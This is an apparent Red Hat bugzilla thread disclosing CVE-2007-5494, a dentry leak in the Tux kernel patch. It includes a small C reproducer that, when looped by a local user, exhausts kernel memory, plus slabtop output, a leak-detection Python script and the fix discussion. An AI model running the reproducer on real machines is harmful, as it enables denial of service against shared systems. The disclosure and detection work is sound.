Due to the issue described in https://bugzilla.redhat.com/show_bug.cgi?id=313681, open(O_ATOMICLOOKUP) leaks the dentry on the filesystems where d_revalidate is implemented, i.e.

open ("/proc/self/exe", O_RDONLY);
open ("/proc/self/exe", O_RDONLY | 02000000);

leaks one dentry. In this way it's possible to eat all the memory on the node or overflow dentry->d_count. Both RHEL4 and RHEL5 kernels are vulnerable.

Acknowledgements: Red Hat would like to credit Vasily Averin for reporting this issue.
Compile the following testcase, run it in a cycle as a user and watch memory leaks via slabtop.

$ cat tst.c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* 02000000 is the O_ATOMICLOOKUP flag introduced by the Tux patch.
 * The second open() takes the atomic lookup path and leaks one dentry
 * reference on filesystems that implement d_revalidate (e.g. procfs). */
int main (int argc, char *argv[])
{
	open ("/proc/self/exe", O_RDONLY);
	open ("/proc/self/exe", O_RDONLY | 02000000);
	return 0;
}

 Active / Total Objects (% used)    : 2082610 / 2086261 (99.8%)
 Active / Total Slabs (% used)      : 94487 / 94488 (100.0%)
 Active / Total Caches (% used)     : 95 / 140 (67.9%)
 Active / Total Size (% used)       : 360064.96K / 360385.06K (99.9%)
 Minimum / Average / Maximum Object : 0.01K / 0.17K / 128.00K

  OBJS ACTIVE  USE OBJ SIZE  SLABS OBJ/SLAB CACHE SIZE NAME
688286 688286 100%    0.13K  23734       29     94936K dentry_cache
682869 682869 100%    0.35K  62079       11    248316K proc_inode_cache
682558 682558 100%    0.04K   6758      101     27032K pid
  3672   3642  99%    0.05K     51       72       204K buffer_head
  3276   3166  96%    0.04K     39       84       156K sysfs_dir_cache
  2576   2483  96%    0.08K     56       46       224K vm_area_struct
  2424   2417  99%    0.48K    303        8      1212K ext3_inode_cache
  2373   2373 100%    0.03K     21      113        84K size-32
  1991   1974  99%    0.33K    181       11       724K inode_cache
  1820   1800  98%    0.27K    130       14       520K radix_tree_node
  1475   1295  87%    0.06K     25       59       100K size-64
  1350   1350 100%    0.12K     45       30       180K size-128
  1016    871  85%    0.01K      4      254        16K anon_vma
  1008    817  81%    0.16K     42       24       168K filp
   858    690  80%    0.05K     11       78        44K selinux_inode_security
   736    648  88%    0.04K      8       92        32K Acpi-Operand
   444    422  95%    2.00K    222        2       888K size-2048
   376    376 100%    0.50K     47        8       188K size-512
   375    375 100%    0.25K     25       15       100K size-256
   360    294  81%    0.19K     18       20        72K skbuff_head_cache
   360    301  83%    0.09K      9       40        36K bio
   338    297  87%    0.02K      2      169         8K Acpi-Namespace
   288    268  93%    0.43K     32        9       128K shmem_inode_cache
   254      8   3%    0.01K      1      254         4K revoke_table
   236    236 100%    0.06K      4       59        16K fs_cache
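The comment above says to "watch memory leaks via slabtop". The following is an added example, not part of the bug report, showing how an administrator could turn that manual check into a script: it parses the object table that slabtop prints, compares two snapshots, and flags caches whose active object count has jumped (the signature of this bug is dentry_cache and proc_inode_cache growing together, as in the listing above). The "after" snapshot reuses the dentry_cache, proc_inode_cache and ext3_inode_cache rows from the report's listing; the "before" snapshot and the thresholds are constructed for illustration.

```python
"""Parse slabtop object tables and flag caches that grow between snapshots.

Added example (not from the bug report). Column layout follows slabtop's
table header: OBJS ACTIVE USE OBJ SIZE SLABS OBJ/SLAB CACHE SIZE NAME.
"""
import re

# The header line that precedes slabtop's per-cache table.
_HEADER = re.compile(
    r"^\s*OBJS\s+ACTIVE\s+USE\s+OBJ SIZE\s+SLABS\s+OBJ/SLAB\s+CACHE SIZE\s+NAME"
)
# One data row, e.g. "688286 688286 100%    0.13K  23734   29   94936K dentry_cache"
_ROW = re.compile(
    r"^\s*(?P<objs>\d+)\s+(?P<active>\d+)\s+(?P<use>\d+)%\s+"
    r"(?P<objsize>[\d.]+)K\s+(?P<slabs>\d+)\s+(?P<per_slab>\d+)\s+"
    r"(?P<cache_kb>\d+)K\s+(?P<name>\S+)\s*$"
)

# Constructed "healthy" snapshot: small dentry/proc_inode caches.
SNAPSHOT_BEFORE = """\
 Active / Total Objects (% used)    : 9107 / 9182 (99.2%)
  OBJS ACTIVE  USE OBJ SIZE  SLABS OBJ/SLAB CACHE SIZE NAME
  4234   4210  99%    0.13K    146       29       584K dentry_cache
  2508   2480  98%    0.35K    228       11       912K proc_inode_cache
  2424   2417  99%    0.48K    303        8      1212K ext3_inode_cache
"""

# Snapshot taken after the reproducer has been run in a loop; the first two
# rows are the values shown in the report, the ext3 row is unchanged.
SNAPSHOT_AFTER = """\
 Active / Total Objects (% used)    : 2082610 / 2086261 (99.8%)
  OBJS ACTIVE  USE OBJ SIZE  SLABS OBJ/SLAB CACHE SIZE NAME
688286 688286 100%    0.13K  23734       29     94936K dentry_cache
682869 682869 100%    0.35K  62079       11    248316K proc_inode_cache
  2424   2417  99%    0.48K    303        8      1212K ext3_inode_cache
"""


def parse_slabtop(text):
    """Return {cache name: {"objs", "active", "size_kb"}} from slabtop output.

    Lines before the table header (the summary block) are ignored, as are
    lines that do not match the row layout.
    """
    caches = {}
    in_table = False
    for line in text.splitlines():
        if _HEADER.match(line):
            in_table = True
            continue
        if not in_table:
            continue
        m = _ROW.match(line)
        if m is None:
            continue
        caches[m["name"]] = {
            "objs": int(m["objs"]),
            "active": int(m["active"]),
            "size_kb": int(m["cache_kb"]),
        }
    return caches


def growing_caches(before, after, min_growth_objs=100000,
                   watch=("dentry_cache", "proc_inode_cache")):
    """Return {name: growth in active objects} for watched caches that grew
    by at least min_growth_objs between the two parsed snapshots."""
    out = {}
    for name in watch:
        a = before.get(name, {}).get("active", 0)
        b = after.get(name, {}).get("active", 0)
        if b - a >= min_growth_objs:
            out[name] = b - a
    return out


def cache_growth_kb(before, after, name):
    """Kilobytes the named cache gained between the snapshots (0 if absent)."""
    a = before.get(name, {}).get("size_kb", 0)
    b = after.get(name, {}).get("size_kb", 0)
    return b - a


if __name__ == "__main__":
    b = parse_slabtop(SNAPSHOT_BEFORE)
    a = parse_slabtop(SNAPSHOT_AFTER)
    for name, delta in growing_caches(b, a).items():
        print(f"{name}: +{delta} active objects, +{cache_growth_kb(b, a, name)}K")
```

In practice the two snapshots would come from `slabtop -o` (or `/proc/slabinfo`) taken a few minutes apart; a dentry_cache that keeps growing while the workload is steady, and never shrinks under memory pressure, is the symptom the report describes.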
Mark, it's tux, via linux-2.6-tux.patch, which introduces this: ... need_revalidate: + if (atomic) + return -EWOULDBLOCKIO; if (dentry->d_op->d_revalidate(dentry, nd)) goto done; if (d_invalidate(dentry)) that return forgets to drop the dentry -Eric
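Review bot: the added `if (atomic) return -EWOULDBLOCKIO;` at the top of `need_revalidate:` exits while the reference that the lookup took on `dentry` is still held, which is exactly the leak the reporter measures (one dentry per open with 02000000). The early return needs to release that reference before bailing out, i.e. `if (atomic) { dput(dentry); return -EWOULDBLOCKIO; }`, so that the atomic path ends up in the same reference state as the non-atomic exits of this label.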
told vendor-sec under embargo
No other vendor said they were vulnerable to this. Description used in text: A memory leak was found in the Tux HTTP accelerator patch. A local user could use this flaw to cause a denial of service (memory exhaustion). (CVE-2007-5494) Removing embargo.
All z-stream children bugs have been closed, future tracking bugs still open, parent is no longer needed.